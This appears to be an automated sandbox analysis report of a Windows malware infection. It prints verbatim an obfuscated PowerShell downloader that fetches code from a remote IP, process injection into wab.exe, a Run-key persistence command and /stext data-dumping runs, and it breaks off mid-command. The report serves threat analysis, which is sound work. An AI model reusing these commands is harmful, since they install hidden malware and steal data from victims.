              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,26_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4923Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4947Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6020Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3769Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2099Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.6 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5464Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844Thread sleep count: 6020 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844Thread sleep count: 3769 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6556Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4736Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3944Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3944Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 2099 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0040AE51 FindFirstFileW,FindNextFileW,26_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,27_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,28_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00418981 memset,GetSystemInfo,26_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WCN\en-GB\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\Jump to behavior
              Source: powershell.exe, 0000000B.00000002.2256205414.000001C4745A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_27-34118
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_07C617D1 LdrInitializeThunk,15_2_07C617D1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,26_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,26_2_004044A4

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 37D0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 255FC20Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rzjadswnvivpittonfdpwjkbajsojzmco"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bbote"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$typhoids213 = 1;$atrible='substrin';$atrible+='g';function noncolloid($offtype){$focalisation=$offtype.length-$typhoids213;for($halmknipperne183=6; $halmknipperne183 -lt $focalisation; $halmknipperne183+=(7)){$eksistensberettigelsers+=$offtype.$atrible.invoke($halmknipperne183, $typhoids213);}$eksistensberettigelsers;}function skruegangen($epileptikere){. ($slagfjedres) ($epileptikere);}$totalsaneringens=noncolloid 'oenophmunesseoma,lesz fastli c,amolrelatil pud.na f.lmk/hem el5 bakk..ensign0hepato lr.rk(feasinwuddrivihalvpunlaanendbltedyopopulaw pectrsfly,as st alvnindladtdiapha kampv1sygele0duv,ty.smaate0t rgiv; finge so,enewpokerfiludd rn elvov6unwins4produk;gastro arylaxd.pped6bl ker4t veaa;nonval prinrbovensv en ag:ce.ser1 bldg.2coelio1 sterr.sellaa0foreto)svange logikpgsub,tienyhedscov,ryekmiljstopan li/horome2d.ctyl0wordst1skibsb0 vajen0cascab1 chubb0 lands1 edest tsil.f.igsstidataber portee tje efblendaobabs nx raspe/subpet1 ,alst2ytterp1terr.s.append0datalo ';$fewterer=noncolloid 'outpouusam ens finebevalgkarndring-museo,at.tradgendagse driftnconveyth skwo ';$onomatological=noncolloid ' dor khreforgtdepicttgrnsevp skatt:la,ish/signal/egebr.8flanne7re.sbg.garden1fluoar2i.sera1ov rta.folioa1forret0vejrud5 galip.jockey1alpeho8overme4tilfrs/kil,brfvandreofusiondklinkeg gulvmn 